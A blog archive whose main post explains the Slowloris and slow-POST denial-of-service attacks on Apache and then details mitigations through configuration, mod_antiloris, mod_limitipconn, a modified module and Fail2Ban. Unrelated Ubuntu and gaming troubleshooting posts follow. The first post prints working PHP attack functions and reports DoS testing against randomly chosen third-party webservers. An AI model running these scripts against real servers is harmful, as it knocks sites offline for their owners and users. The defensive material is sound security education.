Slowloris And Mitigations For Apache

Introduction

If you are the least bit interested in network security, you'll undoubtedly have heard about Slowloris by now.

Slowloris is a piece of software written by Robert "RSnake" Hansen which allows a single machine to take down another machine's web server with minimal bandwidth and side effects on unrelated services and ports. Slowloris tries to keep many connections to the target web server open and hold them open as long as possible. It accomplishes this by opening connections to the target web server and sending a partial request. Periodically, it will send subsequent HTTP headers, adding to—but never completing—the request. Affected servers will keep these connections open, filling their maximum concurrent connection pool, eventually denying additional connection attempts from clients. (From: Wikipedia)

The attack is HTTP-based, and attacks webservers by making lots of keep-alive connections and keeping them alive by sending bogus HTTP headers. The server's connection pool gets filled and no other clients can be served. The attack is said to work on a large number of webservers, according to the project page:

• Apache 1.x
• Apache 2.x
• dhttpd
• GoAhead WebServer
• WebSense "block pages" (unconfirmed)
• Trapeze Wireless Web Portal (unconfirmed)
• Verizon's MI424-WR FIOS Cable modem (unconfirmed)
• Verizon's Motorola Set-Top Box (port 8082 and requires auth - unconfirmed)
• BeeWare WAF (unconfirmed)
• Deny All WAF (unconfirmed)

And does not affect:

• IIS6.0
• IIS7.0
• lighttpd
• Squid
• nginx
• Cherokee (verified by user community)
• Netscaler
• Cisco CSS (verified by user community)

Recently, the method was placed in the spotlights again, because both Wikileaks-supporters and non-supporters were using it to DOS a variety of websites and Wikileaks mirrors. Also, recently, an alternative HTTP-based DOS method was found, using POST requests with a large content length (article).

Attack

I run Apache, so, naturally, I was (and still am) concerned about this attack vector. The first step in preventing and solving security problems lies in understanding the attack. Luckily, in this case, the attack is devilishly simple. Based on a PHP version of the original Slowloris attack (found here), I wrote a modified script which also included the new POST-based attack method. The extended version of the script can be found on Github.

The usage is straightforward:

./scriptname.php <method> <number of processes> <server> [host]

Where:

• <method> is either "get" for the "slow-headers" based attack, or "post" for the new variant;/li>
• <number of processes> determines the number of concurrent requests, around 300 does the trick in most cases;
• <server> is the hostname or IP address of the server you want to target;
• [host] is an optional parameter which will be used in the "Host:"-request header. If left blank the same value as will be used.

The script really illustrates how simple the attacks are, lets comment a bit on the attack_get function:

function attack_get($server, $host){
    # The following lines set up a normal HTTP1.1 GET request with Keep-Alive
    $request  = "GET / HTTP/1.1\r\n";
    $request .= "Host: $host\r\n";
    # Spoof User-Agent (can be changed)
    $request .= "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n";
    # The following header is, strictly speaking, not necessary, all HTTP1.1 requests are kept alive
    $request .= "Keep-Alive: 900\r\n";
    # Just make the Content-Length large enough
    $request .= "Content-Length: " . rand(10000, 1000000) . "\r\n";
    $request .= "Accept: *.*\r\n";
    # First custom header, name can be changed
    $request .= "X-a: " . rand(1, 10000) . "\r\n";

    # Open socket to webserver and send request
    $sockfd = @fsockopen($server, 80, $errno, $errstr);
    @fwrite($sockfd, $request);

    while (true){
     # Try adding another bogus header
        if (@fwrite($sockfd, "X-c:" . rand(1, 100000) . "\r\n")){
         # Sleep for a bit
            sleep(15);
        }else{
            # Sending failed
        }
    }
}

The attack_post function works very similar:

function attack_post($server, $host){
    # Send a post request to a random location, eventually you could change this to make sure you post to an existing URL
    $request  = "POST /".md5(rand())." HTTP/1.1\r\n";
    $request .= "Host: $host\r\n";
    $request .= "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n";
    $request .= "Keep-Alive: 900\r\n";
    # "Prepare yourself webserver, we're going to send a lot here, ready?"
    $request .= "Content-Length: 1000000000\r\n";
    $request .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $request .= "Accept: *.*\r\n";

    $sockfd = @fsockopen($server, 80, $errno, $errstr);
    @fwrite($sockfd, $request);

    while (true){
        # Send a small bit of content
        if (@fwrite($sockfd, ".") !== FALSE){
            # Sleep for a bit, pretend that "We're a terribly slow browser, so sorry..."
            sleep(1);
        }else{
            # Sending failed
        }
    }
}

You can also download an OWASP (Open Web Application Security Project) tool found here which does the same. The tool contains a GUI which lets you choice the attack method (slow headers or slow post), has proxy support, and allows setting attack parameters. The slow header attack can use GET or POST requests, whereas my script above can not and only uses GET. Not that it matters much for that method, as the headers are the crucial factor.

The attack certainly works. In my testing, I was able to DOS about 30% of all sampled webservers (retrieved from just random Google results), including my own. A funny side effect of this method is that, once you stop attacking, the server immediately becomes responsive again as the connection pool is freed. The slow post attack worked more reliable in my testing than the slow headers.

Mitigation

Preventing the attack is not easy. The Apache developers are aware of the problem, but some architectural changes are needed before the problem will be solved. In the meantime, some users have made some suggestions and/or developed solutions themselves:

• Using Apache modules such as mod_limitipconn, mod qos, mod_evasive, mod_security, mod_noloris, and mod_antiloris.
• Making some changes to Apache configuration.
• Using load balancers or proxies. Setting up Varnish in front of Apache seems to be a popular choice.
• Using IPTABLES to block a lot of simultaneous requests from the same IP
• Using Fail2Ban or similar software to ban IP's based on log data
• Making changes to Linux/FreeBSD network parameters using accf, pfctl, sysctl

Since I want to try to keep things simple, I'll look at the Apache configuration, and some helpful modules.

Apache Configuration

This mainly concerns tuning the following: KeepAliveTimeout and Timeout.
Timeout does the following (docs):

The TimeOut directive defines the length of time Apache will wait for I/O in various circumstances:
When reading data from the client, the length of time to wait for a TCP packet to arrive if the read buffer is empty.
When writing data to the client, the length of time to wait for an acknowledgement of a packet if the send buffer is full.

This helps a bit, but an attacker could just increase his own sending rate (e.g. lower the sleep time in the functions above) to work around this.

KeepAliveTimeout then does:

The number of seconds Apache will wait for a subsequent request before closing the connection.

Again, the problem remains. An attacker could just increase the sending rate. Note that, when using the slow headers method, the Timeout directive above might not help a single bit, since the docs state that:

Once a request has been received, the timeout value specified by the Timeout directive applies.

But the full receiving of a request itself takes a long, long time.

Turning KeepAlive completely off might help, but it is no real remedy. The POST attack still remains an issue. Tweaking with the Apache options alone is thus certainly not enough.

mod_antiloris

Some developers have released Apache modules geared to mitigate the Slowloris attack. The two most common ones are mod_antiloris and mod_noloris. Both use the same trick to prevent attacks. They both hook into connection attempts:

ap_hook_process_connection(pre_connection, NULL, NULL, APR_HOOK_FIRST);

And count how many connections from the same remote IP are already in the SERVER_BUSY_READ state (the server is reading data from a client). When this count is too high, subsequent connections get denied:

for (i = 0; i < server_limit; ++i) {
    for (j = 0; j < thread_limit; ++j) {
        ws_record = ap_get_scoreboard_worker(i, j);
        switch (ws_record->status) {
            case SERVER_BUSY_READ:
                if (strcmp(client_ip, ws_record->client) == 0)
                    ip_count++;
                break;
            default:
                break;
        }
    }
}

if (ip_read_count > conf->read_limit) {
    ap_log_error(APLOG_MARK, APLOG_WARNING, 0, NULL, "[client %s] rejected, too many connections in READ state", c->remote_ip);
    return OK;
} else {
    return DECLINED;
}

Installing mod_antiloris in Ubuntu is a simple matter of executing:

$ sudo apt-get install libapache2-mod-antiloris

mod_limitipconn

During testing, I discovered that the mod_antiloris module above only protects against the original slow header variant of the Slowloris attack. The slow post was still killing my webserver. So I explored the use of another mod, named mod_limitipconn, which limits simultaneous requests from the same IP.

There is no Apache2 module of mod_limitipconn in the Ubuntu repositories, but a Debian deb package is available online and works fine on Ubuntu:

# Use the i386 package if you have to...
$ wget http://elonen.iki.fi/code/unofficial-debs/mod-limitipconn/apache2-mod-limitipconn_0.22-2_amd64.deb
$ sudo dpkg -i ./apache2-mod-limitipconn_0.22-2_amd64.deb
$ sudo a2enmod limitipconn

Before you restart Apache, create a configuration file at /etc/apache2/conf.d/limitipconn.conf:

ExtendedStatus On
<IfModule mod_limitipconn.c>
        <Location />
                # Global settings here
                MaxConnPerIP 10
                # No limit for images
                NoIPLimit image/*
        </Location>
</IfModule>

Now the server can be restarted:

$ sudo /etc/init.d/apache2 restart

When investigating the source code of mod_limitipconn, we find the following lines:

/* Count up the number of connections we are handling right now from
* this IP address */
for (i = 0; i < server_limit; ++i) {
    for (j = 0; j < thread_limit; ++j) {
        ws_record = ap_get_scoreboard_worker(i, j);
        switch (ws_record->status) {
            case SERVER_BUSY_READ:
            case SERVER_BUSY_WRITE:
            case SERVER_BUSY_KEEPALIVE:
            case SERVER_BUSY_LOG:
            case SERVER_BUSY_DNS:
            case SERVER_CLOSING:
            case SERVER_GRACEFUL:
                if (strcmp(address, ws_record->client) == 0)
                    ip_count++;
                break;
            default:
                break;
    }
}

Not much different compared to the previous mods, except that mod_limitipconn takes into account all possible server states. Not surprisingly, the attack stopped working after installing this mod. You can disable mod_antiloris when using this module. One might wonder which state actually protects against the slow post attack variant. One would except SERVER_BUSY_READ to intercept these as well, as the server is, in fact, still reading a request from the client and waiting for it to complete. However, as it turns out, the server actually switches to the SERVER_BUSY_WRITE state when receiving a POST, as described on the mailing lists:

However, there is a real problem with all approaches that look for SERVER_BUSY_READ: The attacker can just use a URL that accepts POST requests and send the request body very slowly. These connections have the state SERVER_BUSY_WRITE. This problem affects mod_antiloris and mod_noloris, too (but not mod_reqtimeout). Maybe another state SERVER_BUSY_READ_BODY could be introduced? Or the state could be changed to SERVER_BUSY_READ again when the request body is read?

Interesting information, and some valid points.

Modified mod_antiloris

With this in mind I set out to modify mod_antiloris, as I wasn't completely happy with mod_limitipconn. The module works great, but provided too much configuration overhead. I wanted something really simple. The source code for mod_antiloris was quickly edited to include a second counter, and to check the request string (i.e. it has to contain "POST").

switch (ws_record->status) {
    case SERVER_BUSY_READ:
        if (strcmp(client_ip, ws_record->client) == 0){
     ip_read_count++;
        }
        break;
    case SERVER_BUSY_WRITE:
        if (NULL != strstr(ws_record->request, str_post) && strcmp(client_ip, ws_record->client) == 0){
            ip_write_count++;
        }
        break;
    default:
        break;
}

I also modified the logging to look a bit more like normal Apache error lines. This will come into play in the next step. The full modified source code is available on Github.

Installing and compiling the module requires little work:

$ sudo apt-get install gcc apache2-threaded-dev
$ wget https://gist.github.com/raw/773464/4e7250692c34f55725384525b513e71be7541f5a/mod_muantiloris.c
$ sudo apxs2 -a -i -c mod_muantiloris.c
$ sudo /etc/init.d/apache2 restart

Don't forget to disable mod_antiloris and/or mod_limitipconn if you have them enabled (using a2dismod). The modified module uses only two optional configuration directives:

IPReadLimit (default 5)
IPPostLimit (default 10)

Note: just as with mod_limitipconn, the ExtendedStatus directive should be set to On for this module to work!

The module blocks both attack variants, and logs to error.log like so:

[Tue Jan 11 00:11:35 2011] [warn] [client 0.0.0.0] Antiloris rejected, too many connections in READ state

Mission successful!

Fail2Ban

The following step is optional and only recommended if you already have Fail2Ban installed and running. Fail2Ban is a handy tool to ban IP's based on regex tests on logfiles. (I've caught dozens of Chinese, Brazilian and Russian trespassers already.)

I use the following filter in combination with the modified mod_antiloris above:

[Definition]

# Option:  failregex
# Notes.:  regex to match the password failure messages in the logfile. The
#          host must be matched by a group named "host". The tag "" can
#          be used for standard IP/hostname matching and is only an alias for
#          (?:::f{4,6}:)?(?P[\w\-.^_]+)
# Values:  TEXT
#
failregex = [[]client <host>[]] Antiloris rejected, too many \(POST\) connections in WRITE state
            [[]client <host>[]] Antiloris rejected, too many connections in READ state

# Option:  ignoreregex
# Notes.:  regex to ignore. If this regex matches, the line is ignored.
# Values:  TEXT
#
ignoreregex =

I do set the bantime to a low value and maxretry parameter to a high amount however, as the module tends to generate a lot of error lines and legitimate, aggressive browsers sometimes like to make a lot of concurrent requests as well (mod_limitipconn did have the added benefit of specifying mime type to ignore, although its recognition is based on a reduced URI request string from the Apache scoreboard). Fail2Ban uses IPTables, which has the added benefit that once an IP is banned, Apache can stop dealing with its flooding altogether.


That concludes this blog post. I hope you've found the material helpful. Feel free to use any code here and on Github as you see fit.

Ubuntu Jauntu: Skype Worked Before, Now: "Problem with audio capture"

There are two things I currently not like about Ubuntu or Linux in general: the whole sound mess, and the whole graphics mess (but both are getting better). This problem is about the first mess.

Skype was working perfectly in Interprid, now in Jaunty it was telling me that there was a "Problem with audio capture". I tested Ubuntu's sound-recorder as well, which was not working either.

I'm using the default, normal Skype from the Medibuntu repo's!

Let's take a look at all the different factors here. First of all, open System → Preferences → Sound. Mine looks like this:

• Sound Events - Sound playback: Autodetect
• Music and Movies - Sound playback: Autodetect
• Audio Conferencing
• Sound playback: Autodetect
• Sound capture: ALSA - Advanced Linux Sound Architecture, in your case, this may say PulseAudio Sound Server here. However, I have noticed that ALSA seems to record better sound (less garbled, especially with slower computers). Since we're not doing anything unusual with recorded sound (client-server, multiple inputs), I suggest you also pick ALSA here.

Now right click the sound icon in the panel and pick "Open Volume Control". My device says "HDA Intel (Alsa mixer)". You'll probably need the Alsa mixer as well. I have a few sliders I have to play with:

• In the Playback-tab (yes, here!): Mic Boost
• In the Recording-tab: Capture
• In the Switches-tab: make sure Microphone Capture is enabled! This was disabled after my Jaunty upgrade. If you're not seeing any relevant sliders or checkboxes, click the Preferences-button and enable all relevant sliders/switches.

Now open sound-recorder. You should be able to record sound now. Also, start pavucontrol, and click the Input Devices-tab, the level meter should respond to you clapping your hands for example.

Hear yourself? No, then try fiddling again with the settings in the previously opened windows before you continue!

Yes, good, onwards to Skype. Try making a test call. In my case, Skype was still complaining about the audio capture. Let's open Skype's options → Sound Devices.

In my case, the options were:

• Sound In: HDA Intel (hw:Intel,0)
• Sound Out: pulse
• Ringing: pulse

Which was working in Intrepid. If you suffer the same problem, read on...

A sidenote, your Sound In device might be either pulse or default as well. There are a few cases when you should use these:

• default: if you've succesfully changed configuration files to make the correct devices the default ones. This will almost never be the case.
• pulse: if you're using PulseAudio server for the Sound Capture. But even then, I don't recommend it. Using pulse for Sound In often crashes Skype on my machine...

Again, provided when you use a normal Skype (non static, non OSS).

Your Sound Out/Ringing devices are already correct, they need to be pulse. Sound In will be set to an hw-device.

Before reading further, try making a test call with every listed hw-device (I had four, you can have more or less).

If none of them are working or if you're sure which hw-device you need (and it isn't working), try this: edit /etc/pulse/daemon.conf (don't forget to sudo) and make sure the following lines are present and uncommented, with the following values:

default-fragments = 8
default-fragment-size-msec = 5

This is an optional step however, but it seems to help with the Skype sound quality (an other option is setting default-fragment-size-msec to 10).

(!) Now,  edit ~/.asoundrc (no need to be root here, it's a file in your home directory). And make sure the following lines are there:

pcm.pulse { type pulse }
ctl.pulse { type pulse }

Which I totally did in Hardy as well! The update must've deleted them. This simple file seemed to do the trick!

Then, just to be sure, I reinstalled  the libasound2-plugins package.

Reboot, or restart pulseaudio (kill it, then start it in i.e. a Terminal window). Restart Skype. Skype was working fine now. If it is not, make sure you try every plughw-device.



Still not working, no matter how much you try? You're out of luck. If sound-recorder and sound playback is working, you can try an emergency solution. Install the static, OSS version of Skype (you can find it with Medibuntu or floating around in a tarball somewhere). and start it with:

padsp skype

To route the sounds through the PulseAudio sink. Sound devices in this Skype should all be set to default (or OSS). Calls should work now. Be warned though: always try this as a last resort, routing OSS sound through PulseAudio is slow and bloated, ugly and old. Your record voice will sound like... well, crap.

Vice City (And Perhaps Other Games) In Wine - CD Error With ISO

So, you've just gotten yourself two .iso's for Grand Theft Auto: Vice City (your backups, of course), which you want to play in Wine. What do you do?

That's easy, you say:

sudo mkdir /media/isoimage
sudo mount -o loop ./cd1.iso /media/isoimage

And start the setup with Wine.

Now the installer asks for the second CD, what do you do? Here we have to "eject" our "cd" first...

wine eject
sudo umount /media/isoimage
sudo mount -o loop ./cd2.iso /media/isoimage

And we're done. You want to start the game, but it requires the play disk, even although you're sure you've mounted it. Thing is, Vice City isn't looking at your /media/isoimage mount point, but it's looking at your drive letters... where could the cd be?

Take a look in ~/.wine/dosdevices (it's a hidden directory in your home folder). We're going to create two symbolic links there (in my case, there were a lot of symbolic, broken links already there, I deleted every one of them except c: and z:). One for the mount point, and one for the actual device (or in our case: the image).

ln -sf /media/isoimage ~/.wine/dosdevices/e:
ln -sf ~/cd2.iso ~/.wine/dosdevices/e::

Note the double colons (e::) in the second line. That's it, the game should start fine now.

Be sure to replace /media/isoimage, e:, e::, ~/cd1.iso, ~/cd2.iso and other displayed paths/locations with the ones relevant for you.

Nokia N95, 3G, Bluetooth, And Ubuntu Intrepid - 3G Tethering Howto

The following steps are instructions to surf the web using a Nokia N95 with 3G, connected to your Intrepid laptop via Bluetooth.

1. Make sure you have the required packages installed:

sudo apt-get install bluez-utils bluez-pin ppp

2. Find out the phone's MAC address. Enable Bluetooth on phone and laptop, and enter the following command:

hcitool scan

Output example:

$ hcitool scan
Scanning ...
00:1C:9A:26:F5:DD Macuyiko N95

And note your MAC-address of your phone.

3. Find out the phone's channel, with the N95, this might change from time to time:

sdptool search --bdaddr MAC DUN | grep Channel

Replace MAC with your phone's MAC address.

Output example:

$ sudo sdptool search --bdaddr 00:1C:9A:26:F5:DD DUN | grep Channel
Channel: 4

Note this channel.

4. Edit /etc/ppp/peers/BluetoothDialup:

sudo gedit /etc/ppp/peers/BluetoothDialup

Paste the following:

/dev/rfcomm1 115200
local
nocrtscts
connect "/usr/sbin/chat -v -f /etc/chatscripts/proximus-gprs"
noauth
defaultroute
usepeerdns
novj
remotename proximus
debug
#user
lcp-restart 5
ms-dns 195.238.2.21

There are a few lines which you might need to change. I'm using the Belgium Proximus operator.

First of all, change /etc/chatscripts/proximus-gprs to something more related to your provider (e.g.: /etc/chatscripts/myprovider-gprs). We're going to create this script in the next step. Also: you might need to change the ms-dns entry as well (in most cases you can leave it out, but I had to add it though). Also notice that I have used /dev/rfcomm1 as the used device, we'll use this in the next steps as well.

5. Create a chatscript at /etc/chatscripts/proximus-gprs

sudo gedit /etc/chatscripts/proximus-gprs

Note that you may have chosen a different name for your chatscript in the previous step. Paste:

ABORT BUSY
ABORT 'NO CARRIER'
ABORT VOICE
ABORT 'NO DIALTONE'
ABORT 'NO DIAL TONE'
ABORT 'NO ANSWER'
"" ATZ
OK AT+CGDCONT=1,"IP","internet.proximus.be"
OK ATDT*99#
CONNECT ""

Notice the bold entries? You need to change them for your provider. Look up your APN and data profile number. If you google for "APN 3g [yourprovider]" you will often find the correct results, or look here for APNs for many providers. The data profile number line will often be OK ATDT*99# or OK ATDT*99***1#, so try them both.

6. Try it out

Enter the following command:

rfcomm connect RFCOMM# MAC CHANNEL

Replace RFCOMM# with the /dev/rfcomm-number you've used before (only the number!), I've used 1. MAC is your phone's MAC adres again, and CHANNEL is the channel you found earlier.

If all went well it should say:

$ rfcomm connect 1 00:1C:9A:26:F5:DD 4
Connected /dev/rfcomm1 to 00:1C:9A:26:F5:DD on channel 4
Press CTRL-C for hangup

Now we're going to enable the PPP connection, in a new terminal window (keep the "CTRL-C for hangup"-one open), enter:

pon BluetoothDialup

BluetoothDialup is the filename of the file we have created in /etc/ppp/peers/ earlier in step 4.

If all went well you should see an entry now in your ifconfig output:

$ ifconfig
ppp0      Link encap:Point-to-Point Protocol
          inet addr:81.169.31.99  P-t-P:10.6.6.6  Mask:255.255.255.255
          UP POINTOPOINT RUNNING NOARP MULTICAST  MTU:1500  Metric:1
          RX packets:3 errors:0 dropped:0 overruns:0 frame:0
          TX packets:4 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:3
          RX bytes:54 (54.0 B)  TX bytes:69 (69.0 B)

If you're done surfing the internet, turn off PPP:

poff

Press CTRL-C in that other terminal window to break the Bluetooth/3G-connection.

Note: if you've done something wrong (e.g.: used the wrong channel), you can release rfcomm's with:

rfcomm release RFCOMM#

With RFCOMM# equal to the /dev/rfcomm-number you've used before.

Optional steps: use gnome-ppp to connect

If you have gnome-ppp installed, you can also use a graphical interface to configure the above steps.

First of all, you still have to execute:

rfcomm connect RFCOMM# MAC CHANNEL

But you don't have to create the files from steps 4 and 5. We could automate the connect-step as well, but since the N95's channel changes from time to time, this wouldn't be very convenient. Also, I like having a terminal open to notify me that I'm still surfing via my phone.

Then open up gnome-ppp. If you have to enter a blank username and password for your provider, just enter some dummy values. I used "blank" and "blank" :).

Phone number: I tried *99***1# this time. And it also seemed to work, great!

Then press Setup. Enter the following values:

• Device: /dev/rfcomm1 (or the other rfcomm you defined earlier)
• Type: USB Modem (yes, USB!)
• Speed: 460800 works here, this probably means I could have used this value in the previous configuration files as well, instead of 115200
• Phone Line: Tone (default)
• Volume: High (default)

Then press Init Strings.

• Leave Init 2 unchanged (ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0)
• Enter this in Init 3: AT+CGDCONT=1,"IP","internet.proximus.be"
  Again, change this for your provider! I also had to manually define a DNS in the Networking tab, just like in the previous steps. This might not be the case for you.

You're done, make sure you're not wired or wirelessly connected to test this :).

Screenshot:

Final note: some people have to add novj to /etc/ppp/options as well. I didn't, tho. Check the Ubuntu forums/Google for information about your specific operator and/or hardware.

These instructions were only tested with my Thinkpad, my N95, and my operator. I've set up laptops with Vodafone cards before, and you can use gnome-ppp for those as well, just make sure you're using the correct device. Often the device will be at /dev/ttyS0, but use dmesg to find out the exact location.

Is w32codecs Freezing Your Ubuntu?

Wanted to play an Realmedia file? Installed w32codecs? Now Totem is freezing your Ubuntu Hardy? And by freezing, I mean: you can move the mouse, nothing else workse, no ctrl-alt-backspace, no ctrl-alt-F1.

Then do the following:

1. Make sure you have gstreamer0.10-pitfdll installed.
2. Install (if you haven't already) w32codecs.
3. Execute the following three commands in the terminal:
   rm -rf ~/.gstreamer-0.10
   gst-inspect-0.10
   gst-inspect-0.10 pitfdll
4. Try Totem again. Should work now.

Ubuntu Feisty - Second Problem

Another problem (on another machine) was that it refused booting the new kernel.

Also: the live cd didn't work either, with the same error. A lot of people have problems of this kind, and most of the times they get the following errors:

ata2 is slow to respond, please be patient
ata2 failed to respond (30 secs)
ata2: command 0xa0 timeout, stat 0xd0 host_stat 0x20

And finally it quits to an initramfs shell:

/bin/sh: can't access tty; job control turned off

Note that this last message is normal and has nothing to do with the actual problem. This caused some confusion with some people.

So people have tried various things, here are a few suggestions, most of them came from users and developers:

• Is there a floppy in the drive? Remove it, otherwise, insert a floppy and see if that makes any difference. I didn't care much for this solution. However, it did work for some people...
• Check your IDE configuration in the BIOS, put it on Standard IDE.
• Boot with libata.ignore_hpa=0 added to boot options. (Press e to edit a menu item in the GRUB list, then go to the line which contains the kernel. Always remove quiet and splash and add the above command.) This didn't work with me.
• The solution which worked for me was the following one: add break=top to the boot parameters (see above), don't forget to delete splash and quiet. Once you boot, you will immediately break to an initramfs shell. Try the following commands.
  modprobe piix
  modprobe libata
  modprobe pata_jmicron
  modprobe ata_piix
  modprobe ahci
  modprobe ata_generic
  modprobe ide-disk
  modprobe ide-generic
  Then type exit to continue booting. You don't have to try them all at once. I first tried ide-disk and ide-generic but those didn't work, then I tried only piix, which worked! If that doesn't work, I would suggest trying piix, libata, pata_jmicron, ata_piix, ahci and ata_generic.
  Once you get it running, we must make sure these modules get loaded automatically (instead of always adding break=top). Edit the following file: /etc/initramfs-tools/modules/. E.g., type:
  sudo gedit /etc/initramfs-tools/modules
  And add the modules which worked for you (without modprobe). In my case, I only had to add piix. Save and exit the editor, then execute the following command:
  sudo update-initramfs -u
  Done. Try to restart normally. It should work now. If it doesn't, continue checking the forums and Launchpad.

Feisty Upgrade - First Problem

We recently updated all our Ubuntu machines from Edgy to Feisty. Updating went smooth, apart from a few problems.

The first problem was that X was freezing at random intervals. Xorg log said nothing special, but the GDM log did:

Error in I830WaitLpRing(), now is 7023360, start is 7021359
pgetbl_ctl: 0x3ffc0001 pgetbl_err: 0x0
ipeir: 0 iphdr: 1810000
LP ring tail: 9b38 head: 938c len: 1f801 start 0
eir: 0 esr: 0 emr: ffff
instdone: ffc0 instpm: 0
memmode: 306 instps: f0000
hwstam: ffff ier: 0 imr: ffff iir: 0
space: 129100 wanted 131064

Fatal server error:
lockup

So I did the only thing I could think of: I removed the Videoram lines from xorg.conf. And the freezes seem to have stopped.

Finished

Just updated to Edgy and installed Beryl following these instructions.

Added these to my sources:

deb http://www.beerorkid.com/compiz edgy main-edgy
deb http://media.blutkind.org/xgl/ edgy main-edgy
deb http://compiz-mirror.lupine.me.uk/ edgy main-edgy
deb http://ubuntu.compiz.net/ edgy main-edgy

Then:

sudo apt-get update

Since I use an Intel card:

Add to Section "Device":

Option "XAANoOffscreenPixmaps" "true"

And at the end of the file:

Section "Extensions"
Option "Composite" "true"
EndSection

In /etc/X11/xorg.conf.

Then install Beryl:

sudo apt-get install beryl-core beryl-plugins beryl-plugins-data emerald beryl-settings beryl-manager beryl beryl-dev emerald-themes

Then just start with beryl-manager.

Works like a charm, and quite fast too after tinkering with some effects and themes.

Oki Printers In Ubuntu

Just wanted to share this quick story: recently I had to install Oki C5700 drivers on an Ubuntu machine. A quick look at the web panel revealed that it was not supporting ipp (Cups). So you have to set it up as a Unix Printer (LPR).

After that it seems to work fine. (It is a great laser printer by the way.)

Edgy Tomorrow!

Ah the suspense: Edgy Eft is coming out tomorrow (if all goes well).

Here are the update instructions once more:

• (Backup.)
• gksu "update-manager -c -d" for the masses: quick and easy.
• Or replace dapper with edgy in /etc/apt/sources.list and do a sudo apt-get update && sudo apt-get dist-upgrade.
• Make sure everything is ok:
  sudo apt-get -f install
  sudo dpkg --configure -a

Of course, this is all over Digg and others. But I just couldn't help sharing this. It'll be a tense day tomorrow...

Looking Forward (To October)

I'm really looking forward to the end of October. Since I will then be able to update my Dapper laptop to Edgy Eft which will have AIGLX built in. Then I can install Beryl (a compiz-quinnstorm fork). I will not install beta software however, since I use that laptop for work etc... So the 'how I did it'-guide will have to wait.

If you can't wait however, this LiveCD could help. (Boot with "sabayon aiglx".)

(From the announcement.) Beryl is a fork of compiz, and a collection of other tools to go along with it. CSM has become Beryl Settings Manager (beryl-settings). CGWD has become Emerald, with its companion emerald-theme-manager.

Crappy Scanners And Linux

Recently we got a new HP Scanner. It's a good, nice one without any complaints.

However: the scanner I used before was a crappy scanner with a brand nobody knows, picked up for almost nothing at some cheapskate-store (because I very rarely need to scan something). The installation of the drivers was always a pain, copying files around, right clicking .inf files and whatnot... And then hoping that it wouldn't throw a general 'TWAIN error' at me. People who know something about this whole TWAIN thing know it's a pain. According to Wikipedia, it stands for Technology (or Toolkit or Thing) Without An (or Any) Intelligent (or Important or Interesting) Name, which is just cheesy. Hell, I even think that Microsoft's new WIA (or: Windows Imaging Acquisition) is better.

Anyway: a few weeks ago, my Windows machine gave up scanning, maybe it had something to do with the fact that I was running Windows x64, I don't know. Reinstalling drivers: no dice. Moving files around: no dice. Installing drivers for other scanners (one can try): no dice. Unplugging the damn thing and throwing it out of the window... err... no dice.

Until now. I was thinking: "Hey look, there's that stupid old scanner, maybe this will work on Linux..." So I promised myself that I would spent a few minutes (not more) trying to get this to work, before dumping it completely.

I connect the scanner to a free USB port... nothing happens. No worries, after fiddling around I find that the command is xsane (hey, go easy on me, I'm still a bit of a Linux noob).

So I try that, and get a nice bunch of error messages... perfect.

failed to open device 'artec_eplus48u:libusb:001:002': invalid argument

Really? So my crappy brand scanner is actually an Artec. Fine, after searching a bit on Google I find the following suggestions, export this:
export SANE_DEBUG_ARTEC_EPLUS48U=9

And then run again, we now get some more information:

[artec_eplus48u] Try to open firmware file: "/usr/share/sane/artec_eplus48u/Artec48.usb"
[artec_eplus48u] Cannot open firmware file "/usr/share/sane/artec_eplus48u/1200.usb"
[artec_eplus48u] download_firmware_file failed

Apparently, .usb is a Windows driver, so good luck getting it. Luckily, the drivers where still on my other machine, and I do a search for every .usb I can find. Artec48.usb gets found and copied over to the directory xsane suggests: /usr/share/sane/artec_eplus48 (had to create it).

I tried again... It frickin' works! What a piece of cake.

If you happen to have the same problem, and want the Artec48.usb driver, you may of course drop me a note (macuyiko at gmail dot com).
I'm happy, now this scanner still is a little bit of use. This is what I like about Linux: if you have a problem: continue fiddling and trying without giving up. In the end it'll work out and you'll have learned a lot of things (which is great).

Neverwinter Nights On My Ubuntu-Laptop

Today I finally decided to spend some time and try to install Neverwinter Nights on my laptop, since I absolutely still love that game. Of course: you could follow this howto, but since I don't have NWN Platinum or Diamond, I had to follow other instructions. I didn't want to pirate the game (I legally own the original and the two expansions, so I figured that would work too).

Instead I followed the instructions from Bioware, congrats to them for making this game available on a Linux (and Mac) platform!

Step 1: "Installing Using Downloaded Linux Client Resources"

Download the Linux Client Resources v1.29 (from BioWare). Extract this archive somewhere (e.g.: /home/user/Programs/nwn).

We will do the English install, for other languages: follow the Bioware instructions, these instructions are just narrowed down and compressed...

Also download the Linux Client 1.29 binaries (tar.gz, 5.3 MB). (Make sure you are logged in into the Bioware site, registering is free.) And also extract these into your installation folder. Make sure you overwrite all existing files - this is a rule for all further archives, unless stated otherwise.

If you have SoU and HoU, don't update to the latest version yet. And wait with playing the game ;).

Step 2: "Installing Shadows of Undrentide Expansion Pack"

Make sure step 1 completed succesfully. Since the Linux installer on the disk is broken, we will do it ourselves.

Make sure you can access the following files, they are in the CDs root folder.
Data_Shared.zip
Language_data.zip
Language_update.zip
Data_Linux.zip

Extract them into your installation folder in the above order (overwrite)!

Then delete the following files from your installation folder if they exist:

/INSTALL/data/patch.bif
/INSTALL/patch.key

And then execute the following command from a terminal:

./fixinstall

Step 3: "Installing Hordes of the Underdark Expansion Pack"

Make sure you completed steps 1 and 2.

Remove the following files if they exist:
/INSTALL/patch.key
/INSTALL/data/patch.bif
/INSTALL/ xp1patch.key
/INSTALL/data/xp1patch.bif

Again: get the following archives from the HoU CD root and unzip them into your installation folder in the following order:
Data_Shared.zip
Language_data.zip
Language_update.zip

Download nwclienthotu.tar.gz and also extract it into your nwn directory, overwriting all.

Again, run ./fixinstall from your installation directory.

Step 4: updating

Now update the game, download the patch here. To update, just overwrite-extract the archive you have downloaded in the installation map.

Step 5: fixing

I got the following error when starting Neverwinter with the ./nwn command:
mcop warning: user defined signal handler found for SIG_PIPE, overriding
Creating link /home/username/.kde/socket-hostname.
can't create mcop directory

To fix this, I executed:
mkdir ~/.kde/socket-hostname
Replace hostname with your own hostname, of course (it is mentioned in the error).

